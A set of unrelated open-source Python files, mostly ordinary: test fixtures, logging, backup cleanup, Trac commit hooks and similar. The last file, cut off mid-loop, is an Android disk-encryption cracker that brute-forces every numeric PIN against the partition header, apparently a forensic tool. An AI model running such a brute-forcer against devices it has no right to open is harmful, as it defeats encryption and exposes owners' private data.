self.structure = Structure(
name='Project Struture',
templates=[self.task_template, self.asset_template,
self.shot_template, self.sequence_template]
)
self.project_status_list = StatusList(
name='Project Statuses',
target_entity_type='Project',
statuses=[self.status_new, self.status_wip, self.status_comp]
)
self.image_format = ImageFormat(
name='HD 1080',
width=1920,
height=1080,
pixel_aspect=1.0
)
# create a test project
self.project = Project(
name='Test Project',
code='TP',
repository=self.repo1,
status_list=self.project_status_list,
structure=self.structure,
image_format=self.image_format
)
# create task hierarchy
#
# ASSETS
#
self.assets = Task(
name='Assets',
project=self.project,
responsible=[self.user1]
)
#
# SEQUENCES
#
self.sequences = Task(
name='Sequences',
project=self.project,
responsible=[self.user1]
)
self.seq001 = Sequence(
name='Seq001',
code='Seq001',
parent=self.sequences
)
self.scene_task = Task(
name='001_IST',
parent=self.seq001
)
self.scene_previs_type = Type(
name='Scene Previs',
code='Scene Previs',
target_entity_type='Task'
)
self.scene_previs = Task(
name='Scene Previs',
parent=self.scene_task,
type=self.scene_previs_type
)
self.shots = Task(
name='Shots',
parent=self.scene_task
)
self.shot1 = Shot(
name='Seq001_001_IST_0010',
code='Seq001_001_IST_0010',
parent=self.shots
)
# create shot tasks
self.previs = Task(
name='Previs',
parent=self.shot1
)
self.camera = Task(
name='Camera',
parent=self.shot1
)
self.animation = Task(
name='Animation',
parent=self.shot1
)
self.scene_assembly = Task(
name='SceneAssembly',
parent=self.shot1
)
self.lighting = Task(
name='Lighting',
parent=self.shot1
)
self.comp = Task(
name='Comp',
parent=self.shot1
)
# create maya files
self.maya_env = Maya()
pm.newFile(force=True)
sm = pm.PyNode('sequenceManager1')
seq1 = sm.create_sequence('001_IST')
# create 3 shots
shot1 = seq1.create_shot('shot1')
shot2 = seq1.create_shot('shot2')
shot3 = seq1.create_shot('shot3')
# set shot ranges
shot1.startFrame.set(1)
shot1.endFrame.set(100)
shot2.startFrame.set(101)
shot2.endFrame.set(200)
shot2.sequenceStartFrame.set(101)
shot3.startFrame.set(201)
shot3.endFrame.set(300)
shot3.sequenceStartFrame.set(201)
# save the file under scene previs
v = Version(task=self.scene_previs)
self.maya_env.save_as(v)
pm.newFile(force=1)
print(v.absolute_full_path)
def test_test_setup(self):
"""to test test setup
"""
pass
| sergeneren/anima | tests/env/maya/test_previs.py | Python | bsd-2-clause | 6,717 |
# MusicPlayer, https://github.com/albertz/music-player
# Copyright (c) 2012, Albert Zeyer, www.az2000.de
# All rights reserved.
# This code is under the 2-clause BSD license, see License.txt in the root directory of this project.
def queueMain():
from Player import PlayerEventCallbacks
from Queue import queue
from State import state
queue.fillUpTo() # add some right away if empty...
for ev, args, kwargs in state.updates.read():
if ev is PlayerEventCallbacks.onSongChange:
queue.fillUpTo()
| albertz/music-player | src/modules/mod_queue.py | Python | bsd-2-clause | 505 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import time
import getpass
import schedule
import configparser
import subprocess
import syslog
import json
import datetime
import dateutil.parser
from time import gmtime, strftime
from pytz import timezone
import pytz
from datetime import timedelta
# Configuration
restic_args = ''
restic_password = ''
# Load Configuration
config = configparser.ConfigParser()
config.read("pyresticd.cfg")
restic_args = "snapshots --json"
backup_interval_allowed = timedelta(days=int(config['cleanup']['interval_days']),
hours=int(config['cleanup']['interval_hours']),
minutes=int(config['cleanup']['interval_minutes']),
seconds=int(config['cleanup']['interval_seconds']))
def snapshots_to_delete(password):
last_removed = False
removelist = [] # list of snapshots to be removed!
# run restic
args = [config['restic']['binary']] + restic_args.split()
ps = subprocess.Popen(args, env={
'RESTIC_PASSWORD': password,
'RESTIC_REPOSITORY': config['pyresticd']['repo'],
'PATH': os.environ['PATH'],
},
stdout=subprocess.PIPE,
)
#ps.wait()
json_input = ps.stdout.read()
json_parsed = json.loads(json_input)
last_backup = datetime.datetime(1, 1, 1, tzinfo=timezone('Europe/Berlin'))
for data in json_parsed:
data_datum = dateutil.parser.parse(data['time'])
data_id = data['id'][:8]
print("--------------")
#print(data_datum.strftime('%d.%m.%Y %H:%M:%S'))
print(data_id + " || " + data['time'])
backup_interval_current = data_datum - last_backup
print(backup_interval_current)
if backup_interval_current < backup_interval_allowed and not last_removed:
last_removed = True
print("REMOVE")
removelist.append(data_id)
else:
last_removed = False
# save backup date for the next step
last_backup = data_datum
print("\nSummary for interval " + str(backup_interval_allowed) + "\n==========\n\nI found " + str(len(removelist)) + " of " + str(len(json_parsed)) + " snapshots to delete:\n")
remove_string = ""
for i in removelist:
print(i+" ", end='')
remove_string = remove_string + i + " "
print()
remove_command = config['restic']['binary'] + " -r " + config['pyresticd']['repo'] + " forget " + remove_string
print("Suggested command: \n")
print(remove_command)
if not restic_password and 'RESTIC_PASSWORD' in os.environ:
restic_password = os.environ['RESTIC_PASSWORD']
if not restic_password:
restic_password = getpass.getpass(
prompt='Please enter the restic encryption password: ')
print("Password entered.")
snapshots_to_delete(restic_password)
| Mebus/pyresticd | cleanup.py | Python | bsd-2-clause | 2,933 |
# -*- coding: utf-8 -*-
"""
The Logging component of the Server.
"""
import logging.handlers
################################################################################
class Logging:
"""
This class handles the console and file logging.
"""
def __init__(self, filename):
self._logger = logging.getLogger(filename)
self._logger.setLevel(logging.DEBUG)
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.ERROR)
file_handler = logging.handlers.RotatingFileHandler(
'logs/' + filename + '.log',
encoding = 'utf8',
maxBytes = 1048576, # 1 MB
backupCount = 2)
file_handler.setLevel(logging.DEBUG)
console_formatter = logging.Formatter(
"%(asctime)s - %(levelname)-7s - %(name)-21s - %(message)s",
"%Y-%m-%d %H:%M:%S")
file_formatter = logging.Formatter(
"%(asctime)s - %(levelname)-7s - %(message)s",
"%Y-%m-%d %H:%M:%S")
console_handler.setFormatter(console_formatter)
file_handler.setFormatter(file_formatter)
self._logger.addHandler(console_handler)
self._logger.addHandler(file_handler)
############################################################################
def get_logger(self):
"""
Method to return the logger.
@return: the logger
"""
return self._logger
| andreas-kowasch/DomainSearch | DomainSearchServer/additional/Logging.py | Python | bsd-2-clause | 1,463 |
#*******************************************************************************
# U n s u p e r v i s e d D e c o m p o s i t i o n B a s e *
#*******************************************************************************
class UnsupervisedDecompositionBase(object):
#human readable information
name = "Base Unsupervised Decomposition"
description = "virtual base class"
author = "HCI, University of Heidelberg"
homepage = "http://hci.iwr.uni-heidelberg.de"
def __init__(self):
pass
def decompose(self, features):
pass
def checkNumComponents(self, numChannels, numComponents):
if(numChannels < numComponents):
print "WARNING: The data set comprises", numChannels, "channels. Decomposition into more components (", numComponents, ") is not possible. Using", numChannels, "components instead."
return numChannels
if(numComponents < 1):
print "WARNING: Decomposition into less than one component is not possible. Using one component instead."
return 1
return numComponents
# it is probably NOT a good idea to define this a class level (more than one PLSA
# instance with different numbers of components might exist), but in the current
# ilastik architecture this method is called before the instance is even created,
# so it HAS to be a class method for now
# workaround: set self.numComponents in init function
@classmethod
def setNumberOfComponents(cls, numComponents):
cls.numComponents = numComponents
| ilastik/ilastik-0.5 | ilastik/modules/unsupervised_decomposition/core/algorithms/unsupervisedDecompositionBase.py | Python | bsd-2-clause | 1,598 |
# proxy module
from __future__ import absolute_import
from apptools.help.help_plugin.help_doc import *
| enthought/etsproxy | enthought/help/help_plugin/help_doc.py | Python | bsd-3-clause | 103 |
# -*- coding: utf-8 -*-
# Copyright (c) 2013, Mayo Clinic
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of the <ORGANIZATION> nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
from rf2db.schema import rf2
from rf2db.parameterparser.ParmParser import ParameterDefinitionList, enumparam, intparam, computedparam, \
strparam, booleanparam
from rf2db.utils import urlutil
# Iteration Parameters
#
# order - sort order of returned values. The specific sort keys depend on the type of resource
# accessed. Possible values are I{asc} for ascending and I{desc} for descending. Default: "asc"
# maxtoreturn - maximum values to return in a list. 0 we're just doing a count. Default: 100
# page - starting page number. Return begins at entry C{page * maxtoreturn}. Default: 0
# locked - if True, only return locked records. (Must be accompanied by a changeset id)
# sort - list of columns to sort by "None" means don't sort at all
# TODO: the default on maxtoreturn needs to be pulled from the rf2 parameter set
iter_parms = ParameterDefinitionList()
iter_parms.order = enumparam(['asc', 'desc'], default='asc')
iter_parms.page = intparam(default=0)
iter_parms.maxtoreturn = intparam(default=20)
iter_parms.start = computedparam(lambda p: p.page * p.maxtoreturn)
iter_parms.sort = strparam(splittable=True)
iter_parms.locked = booleanparam(default=False)
class RF2Iterator(rf2.Iterator, object):
def setup(self, parmlist, autoSkip=False):
""" Create a directory listing. This can be used in a number of ways, including:
@param autoSkip: if True, append will skip the leading entries. If false, the client does the skipping
@type autoSkip: C{bool}
"""
self._parmlist = parmlist
self._skip = parmlist.page * parmlist.maxtoreturn if autoSkip else 0
# This is deliberately left off because it forces callers to invoke finish
# self.complete = complete
self.numEntries = 0
self.at_end = False
return self
def add_entry(self, entry, **kw):
""" Add the entry to the directory. If the skip count is positive, the entry will be skipped. The general
pattern that can be used in this call is:
for e in list:
if not rval.append(e):
rval.finish(True)
return rval
rval.finish(False)
@param entry: The entry to append
@type entry: C{DirectoryEntry}
@return: True if appending should continue, False if no more should be added
"""
if self._skip > 0:
self._skip -= 1
return True
if self._parmlist.maxtoreturn < 0 or self.numEntries < self._parmlist.maxtoreturn:
self.entry.append(entry)
self.numEntries += 1
self.at_end = self._parmlist.maxtoreturn > 0 and self.numEntries >= self._parmlist.maxtoreturn
return not self.at_end
def finish(self, moreToCome=False, total=0):
""" Finalize an appending process, setting COMPLETE, next and prev
Returns the resource for convenience
"""
if not self._parmlist.maxtoreturn:
self.numEntries = total
self.complete = rf2.CompleteDirectory.COMPLETE
else:
if self._parmlist.maxtoreturn > 0 and self.numEntries >= self._parmlist.maxtoreturn and moreToCome:
self.next = urlutil.forxml(urlutil.append_params(urlutil.strip_control_params(urlutil.relative_uri()),
dict(self._parmlist.nondefaulteditems(),
**{'page': str(self._parmlist.page + 1),
'maxtoreturn': str(self._parmlist.maxtoreturn)})))
if self._parmlist.maxtoreturn > 0 and self._parmlist.page > 0:
self.prev = urlutil.forxml(urlutil.append_params(urlutil.strip_control_params(urlutil.relative_uri()),
dict(self._parmlist.nondefaulteditems(),
**{'page': str(self._parmlist.page - 1),
'maxtoreturn': str(self._parmlist.maxtoreturn)})))
self.complete = rf2.CompleteDirectory.COMPLETE if not (
self.next or self.prev) else rf2.CompleteDirectory.PARTIAL
return self
def rf2iterlink(pyxbElement, pyxbType):
def impl_link(impl_class):
def constructor(parmlist, autoSkip=False):
return pyxbElement().setup(parmlist, autoSkip=autoSkip)
pyxbType._SetSupersedingClass(impl_class)
return constructor
return impl_link
@rf2iterlink(rf2.ConceptList, rf2.ConceptList_)
class RF2ConceptList(rf2.ConceptList_, RF2Iterator):
pass
@rf2iterlink(rf2.DescriptionList, rf2.DescriptionList_)
class RF2DescriptionList(rf2.DescriptionList_, RF2Iterator):
pass
@rf2iterlink(rf2.RelationshipList, rf2.RelationshipList_)
class RF2RelationshipList(rf2.RelationshipList_, RF2Iterator):
pass
@rf2iterlink(rf2.ConceptList, rf2.ConceptList_)
class RF2ConceptList(rf2.ConceptList_, RF2Iterator):
pass
@rf2iterlink(rf2.IdentifierList, rf2.IdentifierList_)
class RF2IdentifierList(rf2.IdentifierList_, RF2Iterator):
pass
@rf2iterlink(rf2.TransitiveClosureHistoryList, rf2.TransitiveClosureHistoryList_)
class RF2TransitiveClosureHistoryList(rf2.TransitiveClosureHistoryList_, RF2Iterator):
pass
@rf2iterlink(rf2.DescriptorReferenceSet, rf2.DescriptorReferenceSet_)
class RF2DescriptorReferenceSet(rf2.DescriptorReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.OrderedReferenceSet, rf2.OrderedReferenceSet_)
class RF2OrderedReferenceSet(rf2.OrderedReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.AttributeValueReferenceSet, rf2.AttributeValueReferenceSet_)
class RF2AttributeValueReferenceSet(rf2.AttributeValueReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.SimpleReferenceSet, rf2.SimpleReferenceSet_)
class RF2SimpleReferenceSet(rf2.SimpleReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.SimpleMapReferenceSet, rf2.SimpleMapReferenceSet_)
class RF2SimpleMapReferenceSet(rf2.SimpleMapReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.ComplexMapReferenceSet, rf2.ComplexMapReferenceSet_)
class RF2ComplexMapReferenceSet(rf2.ComplexMapReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.LanguageReferenceSet, rf2.LanguageReferenceSet_)
class RF2LanguageReferenceSet(rf2.LanguageReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.QuerySpecificationReferenceSet, rf2.QuerySpecificationReferenceSet_)
class RF2QuerySpecificationReferenceSet(rf2.QuerySpecificationReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.AnnotationReferenceSet, rf2.AnnotationReferenceSet_)
class RF2AnnotationReferenceSet(rf2.AnnotationReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.AssociationReferenceSet, rf2.AssociationReferenceSet_)
class RF2AssociationReferenceSet(rf2.AssociationReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.ModuleDepencencyReferenceSet, rf2.ModuleDepencencyReferenceSet_)
class RF2ModuleDepencencyReferenceSet(rf2.ModuleDepencencyReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.DescriptionFormatReferenceSet, rf2.DescriptionFormatReferenceSet_)
class RF2DescriptionFormatReferenceSet(rf2.DescriptionFormatReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.ChangeSetReferenceSet, rf2.ChangeSetReferenceSet_)
class RF2ChangeSetReferenceSet(rf2.ChangeSetReferenceSet_, RF2Iterator):
pass | cts2/rf2db | rf2db/parsers/RF2Iterator.py | Python | bsd-3-clause | 9,117 |
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Class for running uiautomator tests on a single device."""
from pylib.instrumentation import test_options as instr_test_options
from pylib.instrumentation import test_runner as instr_test_runner
class TestRunner(instr_test_runner.TestRunner):
"""Responsible for running a series of tests connected to a single device."""
def __init__(self, test_options, device, shard_index, test_pkg,
ports_to_forward):
"""Create a new TestRunner.
Args:
test_options: A UIAutomatorOptions object.
device: Attached android device.
shard_index: Shard index.
test_pkg: A TestPackage object.
ports_to_forward: A list of port numbers for which to set up forwarders.
Can be optionally requested by a test case.
"""
# Create an InstrumentationOptions object to pass to the super class
instrumentation_options = instr_test_options.InstrumentationOptions(
test_options.tool,
test_options.cleanup_test_files,
test_options.push_deps,
test_options.annotations,
test_options.exclude_annotations,
test_options.test_filter,
test_options.test_data,
test_options.save_perf_json,
test_options.screenshot_failures,
wait_for_debugger=False,
coverage_dir=None,
test_apk=None,
test_apk_path=None,
test_apk_jar_path=None)
super(TestRunner, self).__init__(instrumentation_options, device,
shard_index, test_pkg, ports_to_forward)
self.package_name = test_options.package_name
#override
def InstallTestPackage(self):
self.test_pkg.Install(self.adb)
#override
def PushDataDeps(self):
pass
#override
def _RunTest(self, test, timeout):
self.adb.ClearApplicationState(self.package_name)
if 'Feature:FirstRunExperience' in self.test_pkg.GetTestAnnotations(test):
self.flags.RemoveFlags(['--disable-fre'])
else:
self.flags.AddFlags(['--disable-fre'])
return self.adb.RunUIAutomatorTest(
test, self.test_pkg.GetPackageName(), timeout)
| mogoweb/chromium-crosswalk | build/android/pylib/uiautomator/test_runner.py | Python | bsd-3-clause | 2,258 |
import numpy as np
import h5py
from checkpoint import Writer, create_reader
class Baz:
def __init__(self):
self.z = {1:'one', 'two': 2, 'tree': [1,2,'three']}
def write(self, group):
writer = Writer(group, self)
writer.yaml('z')
@staticmethod
def read(group):
foo, reader = create_reader(Baz, group)
reader.yaml('z')
return foo
class Bar:
def __init__(self):
self.x = np.linspace(0,5,11)
self.y = np.linspace(0,1,11)
self.baz = Baz()
def write(self, group):
writer = Writer(group, self)
writer.arrays('x', 'y')
writer.recurse('baz')
@staticmethod
def read(group):
foo, reader = create_reader(Bar, group)
reader.arrays('x', 'y')
reader.recurse(Baz, 'baz')
return foo
class Foo:
def __init__(self):
self.a = 1.1
self.l = [ [1,5,2], [6,0], [], [1,3,4], [7] ]
self.d = {(1,2): [10,20], (3,4): [30,40]}
self.bar = Bar()
def write(self, group):
writer = Writer(group, self)
writer.scalar('a')
writer.crs('l')
writer.dict('d')
writer.recurse('bar')
@staticmethod
def read(group):
foo, reader = create_reader(Foo, group)
reader.scalar('a')
reader.crs('l')
reader.dict('d')
reader.recurse(Bar, 'bar')
return foo
def main():
foo = Foo()
with h5py.File('foo.h5', 'w') as f:
foo.write(f)
with h5py.File('foo.h5', 'r') as f:
foo_bis = Foo.read(f)
assert foo_bis.a == foo.a
assert foo_bis.l == foo.l
assert foo_bis.d == foo.d
np.testing.assert_array_equal(foo_bis.bar.x, foo.bar.x)
np.testing.assert_array_equal(foo_bis.bar.y, foo.bar.y)
assert foo_bis.bar.baz.z == foo.bar.baz.z
if __name__ == '__main__':
main()
| thni/clash | checkpoint/example/main.py | Python | bsd-3-clause | 1,870 |
# proxy module
from pyface.layered_panel import *
| enthought/etsproxy | enthought/pyface/layered_panel.py | Python | bsd-3-clause | 50 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2009 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
# This plugin was based on the contrib/trac-post-commit-hook script, which
# had the following copyright notice:
# ----------------------------------------------------------------------------
# Copyright (c) 2004 Stephen Hansen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# ----------------------------------------------------------------------------
from __future__ import with_statement
from datetime import datetime
import re
from genshi.builder import tag
from trac.config import BoolOption, Option
from trac.core import Component, implements
from trac.perm import PermissionCache
from trac.resource import Resource
from trac.ticket import Ticket
from trac.ticket.notification import TicketNotifyEmail
from trac.util.datefmt import utc
from trac.util.text import exception_to_unicode
from trac.util.translation import _, cleandoc_
from trac.versioncontrol import IRepositoryChangeListener, RepositoryManager
from trac.versioncontrol.web_ui.changeset import ChangesetModule
from trac.wiki.formatter import format_to_html
from trac.wiki.macros import WikiMacroBase
class CommitTicketUpdater(Component):
"""Update tickets based on commit messages.
This component hooks into changeset notifications and searches commit
messages for text in the form of:
{{{
command #1
command #1, #2
command #1 & #2
command #1 and #2
}}}
Instead of the short-hand syntax "#1", "ticket:1" can be used as well,
e.g.:
{{{
command ticket:1
command ticket:1, ticket:2
command ticket:1 & ticket:2
command ticket:1 and ticket:2
}}}
In addition, the ':' character can be omitted and issue or bug can be used
instead of ticket.
You can have more than one command in a message. The following commands
are supported. There is more than one spelling for each command, to make
this as user-friendly as possible.
close, closed, closes, fix, fixed, fixes::
The specified tickets are closed, and the commit message is added to
them as a comment.
references, refs, addresses, re, see::
The specified tickets are left in their current status, and the commit
message is added to them as a comment.
A fairly complicated example of what you can do is with a commit message
of:
Changed blah and foo to do this or that. Fixes #10 and #12,
and refs #12.
This will close #10 and #12, and add a note to #12.
"""
implements(IRepositoryChangeListener)
envelope = Option('ticket', 'commit_ticket_update_envelope', '',
"""Require commands to be enclosed in an envelope.
Must be empty or contain two characters. For example, if set to "[]",
then commands must be in the form of [closes #4].""")
commands_close = Option('ticket', 'commit_ticket_update_commands.close',
'close closed closes fix fixed fixes',
"""Commands that close tickets, as a space-separated list.""")
commands_refs = Option('ticket', 'commit_ticket_update_commands.refs',
'addresses re references refs see',
"""Commands that add a reference, as a space-separated list.
If set to the special value <ALL>, all tickets referenced by the
message will get a reference to the changeset.""")
check_perms = BoolOption('ticket', 'commit_ticket_update_check_perms',
'true',
"""Check that the committer has permission to perform the requested
operations on the referenced tickets.
This requires that the user names be the same for Trac and repository
operations.""")
notify = BoolOption('ticket', 'commit_ticket_update_notify', 'true',
"""Send ticket change notification when updating a ticket.""")
ticket_prefix = '(?:#|(?:ticket|issue|bug)[: ]?)'
ticket_reference = ticket_prefix + '[0-9]+'
ticket_command = (r'(?P<action>[A-Za-z]*)\s*.?\s*'
r'(?P<ticket>%s(?:(?:[, &]*|[ ]?and[ ]?)%s)*)' %
(ticket_reference, ticket_reference))
@property
def command_re(self):
(begin, end) = (re.escape(self.envelope[0:1]),
re.escape(self.envelope[1:2]))
return re.compile(begin + self.ticket_command + end)
ticket_re = re.compile(ticket_prefix + '([0-9]+)')
_last_cset_id = None
# IRepositoryChangeListener methods
def changeset_added(self, repos, changeset):
if self._is_duplicate(changeset):
return
tickets = self._parse_message(changeset.message)
comment = self.make_ticket_comment(repos, changeset)
self._update_tickets(tickets, changeset, comment,
datetime.now(utc))
def changeset_modified(self, repos, changeset, old_changeset):
if self._is_duplicate(changeset):
return
tickets = self._parse_message(changeset.message)
old_tickets = {}
if old_changeset is not None:
old_tickets = self._parse_message(old_changeset.message)
tickets = dict(each for each in tickets.iteritems()
if each[0] not in old_tickets)
comment = self.make_ticket_comment(repos, changeset)
self._update_tickets(tickets, changeset, comment,
datetime.now(utc))
def _is_duplicate(self, changeset):
# Avoid duplicate changes with multiple scoped repositories
cset_id = (changeset.rev, changeset.message, changeset.author,
changeset.date)
if cset_id != self._last_cset_id:
self._last_cset_id = cset_id
return False
return True
def _parse_message(self, message):
"""Parse the commit message and return the ticket references."""
cmd_groups = self.command_re.finditer(message)
functions = self._get_functions()
tickets = {}
for m in cmd_groups:
cmd, tkts = m.group('action', 'ticket')
func = functions.get(cmd.lower())
if not func and self.commands_refs.strip() == '<ALL>':
func = self.cmd_refs
if func:
for tkt_id in self.ticket_re.findall(tkts):
tickets.setdefault(int(tkt_id), []).append(func)
return tickets
def make_ticket_comment(self, repos, changeset):
"""Create the ticket comment from the changeset data."""
rev = changeset.rev
revstring = str(rev)
drev = str(repos.display_rev(rev))
if repos.reponame:
revstring += '/' + repos.reponame
drev += '/' + repos.reponame
return """\
In [changeset:"%s" %s]:
{{{
#!CommitTicketReference repository="%s" revision="%s"
%s
}}}""" % (revstring, drev, repos.reponame, rev, changeset.message.strip())
def _update_tickets(self, tickets, changeset, comment, date):
"""Update the tickets with the given comment."""
authname = self._authname(changeset)
perm = PermissionCache(self.env, authname)
for tkt_id, cmds in tickets.iteritems():
try:
self.log.debug("Updating ticket #%d", tkt_id)
save = False
with self.env.db_transaction:
ticket = Ticket(self.env, tkt_id)
ticket_perm = perm(ticket.resource)
for cmd in cmds:
if cmd(ticket, changeset, ticket_perm) is not False:
save = True
if save:
ticket.save_changes(authname, comment, date)
if save:
self._notify(ticket, date)
except Exception, e:
self.log.error("Unexpected error while processing ticket "
"#%s: %s", tkt_id, exception_to_unicode(e))
def _notify(self, ticket, date):
"""Send a ticket update notification."""
if not self.notify:
return
tn = TicketNotifyEmail(self.env)
try:
tn.notify(ticket, newticket=False, modtime=date)
except Exception, e:
self.log.error("Failure sending notification on change to "
"ticket #%s: %s", ticket.id,
exception_to_unicode(e))
def _get_functions(self):
"""Create a mapping from commands to command functions."""
functions = {}
for each in dir(self):
if not each.startswith('cmd_'):
continue
func = getattr(self, each)
for cmd in getattr(self, 'commands_' + each[4:], '').split():
functions[cmd] = func
return functions
def _authname(self, changeset):
return changeset.author.lower() \
if self.env.config.getbool('trac', 'ignore_auth_case') \
else changeset.author
# Command-specific behavior
# The ticket isn't updated if all extracted commands return False.
def cmd_close(self, ticket, changeset, perm):
authname = self._authname(changeset)
if self.check_perms and not 'TICKET_MODIFY' in perm:
self.log.info("%s doesn't have TICKET_MODIFY permission for #%d",
authname, ticket.id)
return False
ticket['status'] = 'closed'
ticket['resolution'] = 'fixed'
if not ticket['owner']:
ticket['owner'] = authname
def cmd_refs(self, ticket, changeset, perm):
if self.check_perms and not 'TICKET_APPEND' in perm:
self.log.info("%s doesn't have TICKET_APPEND permission for #%d",
self._authname(changeset), ticket.id)
return False
class CommitTicketReferenceMacro(WikiMacroBase):
_domain = 'messages'
_description = cleandoc_(
"""Insert a changeset message into the output.
This macro must be called using wiki processor syntax as follows:
{{{
{{{
#!CommitTicketReference repository="reponame" revision="rev"
}}}
}}}
where the arguments are the following:
- `repository`: the repository containing the changeset
- `revision`: the revision of the desired changeset
""")
def expand_macro(self, formatter, name, content, args={}):
reponame = args.get('repository') or ''
rev = args.get('revision')
repos = RepositoryManager(self.env).get_repository(reponame)
try:
changeset = repos.get_changeset(rev)
message = changeset.message
rev = changeset.rev
resource = repos.resource
except Exception:
message = content
resource = Resource('repository', reponame)
if formatter.context.resource.realm == 'ticket':
ticket_re = CommitTicketUpdater.ticket_re
if not any(int(tkt_id) == int(formatter.context.resource.id)
for tkt_id in ticket_re.findall(message)):
return tag.p(_("(The changeset message doesn't reference this "
"ticket)"), class_='hint')
if ChangesetModule(self.env).wiki_format_messages:
return tag.div(format_to_html(self.env,
formatter.context.child('changeset', rev, parent=resource),
message, escape_newlines=True), class_='message')
else:
return tag.pre(message, class_='message')
| exocad/exotrac | tracopt/ticket/commit_updater.py | Python | bsd-3-clause | 12,921 |
import shutil
import subprocess as sub
pdf = '_build/latex/gcmstools.pdf'
try:
sub.call(['make', 'latexpdf'])
except:
print("There was an error in latexpdf generation.")
else:
shutil.copy(pdf, '..')
sub.call(['make', 'clean'])
| rnelsonchem/gcmstools | docs/makepdf.py | Python | bsd-3-clause | 246 |
#!/usr/bin/env python
# Authors: Thomas Cannon <[email protected]>
# Seyton Bradford <[email protected]>
# Cedric Halbronn <[email protected]>
# TAGS: Android, Device, Decryption, Crespo, Bruteforce
#
# Parses the header for the encrypted userdata partition
# Decrypts the master key found in the footer using a supplied password
# Bruteforces the pin number using the header
#
# --
# Revision 0.1 (released by Thomas)
# ------------
# Written for Nexus S (crespo) running Android 4.0.4
# Header is located in file userdata_footer on the efs partition
#
# --
# Revision 0.3 (shipped with Santoku Alpha 0.3)
# ------------
# Added support for more than 4-digit PINs
# Speed improvements
#
# --
# Revision 0.4 (released by Cedric)
# ------------
# Adapted to support HTC One running Android 4.2.2
# Header is located in "extra" partition located in mmcblk0p27
# Note: changed name from bruteforce_stdcrypto.py to bruteforce.py
# --
#
from fde import *
def bruteforce_pin(encrypted_partition, encrypted_key, salt, maxdigits):
# load the header data for testing the password
#data = open(headerFile, 'rb').read(32)
#skip: "This is an encrypted device:)"
fd = open(encrypted_partition, 'rb')
fd.read(32)
data = fd.read(32)
fd.close()
print 'Trying to Bruteforce Password... please wait'
# try all possible 4 to maxdigits digit PINs, returns value immediately when found
for j in itertools.product(xrange(10),repeat=maxdigits):
# decrypt password
passwdTry = ''.join(str(elem) for elem in j)
#print 'Trying: ' + passwdTry
# -- In case you prefer printing every 100
try:
if (int(passwdTry) % 100) == 0:
print 'Trying passwords from %d to %d' %(int(passwdTry),int(passwdTry)+100)
except:
pass
# make the decryption key from the password
decrypted_key = get_decrypted_key(encrypted_key, salt, passwdTry)
# try to decrypt the frist 32 bytes of the header data (we don't need the iv)
# We do not use the ESSIV as IV generator
# Decrypting with the incorrect IV causes the first block of plaintext to be
# corrupt but subsequent plaintext blocks will be correct.
# http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher-block_chaining_.28CBC.29
decData = decrypt_data(decrypted_key, "", data)
# has the test worked?
